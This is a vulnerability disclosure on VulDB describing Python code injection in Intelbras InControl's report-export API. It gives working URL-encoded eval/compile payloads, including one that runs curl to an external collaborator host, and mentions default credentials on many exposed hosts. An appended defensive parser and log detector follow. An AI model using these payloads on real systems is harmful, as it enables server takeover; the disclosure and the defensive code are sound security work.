| Title | Intelbras InControl 2.21.57 (last version) Command Injection |
|---|
| Description | Hello, I found a Python code injection vulnerability in the latest version of the InControl product. The vulnerability occurs through an API call for report export; through the vulnerability it is possible to take full control of the server. On fofa.info, there are over 2500 vulnerable hosts, with many of them having the default admin/admin credential.
PoC:
Language Software: PT-BR
1 - After downloading the application and uploading it locally, log in with admin/admin and access the "Reports" or "Relatórios" section and "Relatório de Operadores".
2 - Check a box and click "Export report" and select "PDF".
3 - In burp, you can see that there is an api call like this:
(Investigating further I discovered that there are two paths /v1/operador/... and /v1/evento_operador/...)
GET /v1/evento_operador/relatorio?page=1&limit=10000&fields=%5B%22operador%22,%22acao%22,%22data_evento%22,%22objeto_afetado%22,%22tipo_objeto%22%5D
or
GET /v1/operador/relatorio?page=1&limit=10000&fields=%5B%22operador%22,%22acao%22,%22data_evento%22,%22objeto_afetado%22,%22tipo_objeto%22%5D
4 - Python code injection occurs in the "fields=" parameter.
5 - Take the request to the repeater and insert the following payload containing python code:
/v1/evento_operador/relatorio?page=1&limit=10000&fields=eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))
6 - Note that the response took 20 seconds to come.
7 - Through this, we can execute commands. Watch the video below for better understanding (Please do not share the video!)
https://youtu.be/UdZVktPUy8A
Requests (EXECUTE CURL TO COLLABORATOR):
GET /v1/operador/relatorio?page=1&limit=10000&fields=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27curl%20http://0tucwq2m62h4pzo0gs2iif1lico3cw0l.oastify.com%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 HTTP/1.1
Host: localhost:4441
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
Origin: https://localhost:4445
Referer: https://localhost:4445/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: keep-alive
Payloads:
Time Delay: eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))
Curl: eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27curl%20http://0tucwq2m62h4pzo0gs2iif1lico3cw0l.oastify.com%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 |
|---|
| Source | https://www.intelbras.com/pt-br/software-de-gerenciamento-de-controle-de-acesso-incontrol-web |
|---|
| User | Stux (UID 40142) |
|---|
| Submission | 07/16/2024 15:55 (2 years ago) |
|---|
| Moderation | 09/28/2024 15:31 (2 months later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 278828 [Intelbras InControl up to 2.21.57 Relatório de Operadores Page /v1/operador/ fields code injection] |
|---|
| Points | 20 |
|---|
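The report attributes the issue to the `fields=` parameter of the report endpoints, whose legitimate value is a URL-encoded JSON array of column names. The following is an added example, not Intelbras code and not taken from the submission: it shows how such a parameter should be consumed on the server side (parsed as JSON data and checked against an allowlist, never evaluated) and how the same rule can be applied to request logs to separate benign exports from rejected and injection-shaped requests. The column allowlist is assumed from the benign request in the report; the product's real allowlist and handler are unknown.

```python
"""Added example (hypothetical, not the vendor's code): a safe parser for a
report API's ``fields`` query parameter and a log classifier for it.

Assumption: a legitimate ``fields`` value is a URL-encoded JSON array of
column names, as in the benign request shown in the report.
"""
import json
import re
from urllib.parse import parse_qs, urlparse

# Columns the report endpoint may return. Taken from the benign request in the
# report; the real product's allowlist is an assumption here.
ALLOWED_FIELDS = frozenset(
    {"operador", "acao", "data_evento", "objeto_afetado", "tipo_objeto"}
)


class InvalidFields(ValueError):
    """The fields parameter is not a JSON array of known column names."""


def parse_fields(decoded: str) -> list:
    """Parse an already URL-decoded ``fields`` value into a list of columns.

    json.loads treats the input strictly as data, so Python source in the
    parameter is a parse error rather than something that gets executed.
    Every element must be a string on the allowlist; duplicates are dropped.
    """
    try:
        value = json.loads(decoded)
    except json.JSONDecodeError as exc:
        raise InvalidFields(f"fields is not valid JSON: {exc.msg}") from None
    if not isinstance(value, list) or not value:
        raise InvalidFields("fields must be a non-empty JSON array")
    columns = []
    for item in value:
        if not isinstance(item, str) or item not in ALLOWED_FIELDS:
            raise InvalidFields(f"unknown field: {item!r}")
        if item not in columns:
            columns.append(item)
    return columns


def is_valid_fields(decoded: str) -> bool:
    """True when parse_fields accepts the value, False when it rejects it."""
    try:
        parse_fields(decoded)
    except InvalidFields:
        return False
    return True


# Tokens that never occur in a legitimate column list but do occur in the
# code-injection payloads the report describes (eval/compile wrappers).
_INJECTION_RE = re.compile(
    r"\b(eval|exec|compile|__import__|os\.popen|subprocess)\b", re.I
)


def classify_request(target: str) -> str:
    """Classify one request target (path + query) from an access log.

    Returns 'ok' for an allowlisted column list, 'reject' for a value the
    parser would refuse, and 'inject' when the value carries code-execution
    tokens that warrant an alert rather than a silent 400.
    """
    query = parse_qs(urlparse(target).query, keep_blank_values=True)
    raw = query.get("fields", [""])[0]  # parse_qs already URL-decodes
    if _INJECTION_RE.search(raw):
        return "inject"
    return "ok" if is_valid_fields(raw) else "reject"


# Constructed sample request targets for demonstration.
SAMPLE_REQUESTS = [
    # benign export, shape taken from the report's normal request
    "/v1/operador/relatorio?page=1&limit=10000"
    "&fields=%5B%22operador%22,%22acao%22%5D",
    # the time-delay probe quoted in the report
    "/v1/evento_operador/relatorio?page=1&limit=10000"
    "&fields=eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time"
    "%5cn%20time.sleep(20)'%2c'a'%2c'single'))",
    # well-formed JSON, but a column that is not on the allowlist
    "/v1/operador/relatorio?page=1&limit=10&fields=%5B%22senha%22%5D",
]


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(f"{classify_request(target):7} {target[:60]}")
```

In a handler, replace any `eval`-style interpretation of the parameter with `parse_fields`, and return a 400 on `InvalidFields`; the classifier can run over historical access logs to find past exploitation attempts, since the injection payloads are distinguishable from normal exports by shape alone.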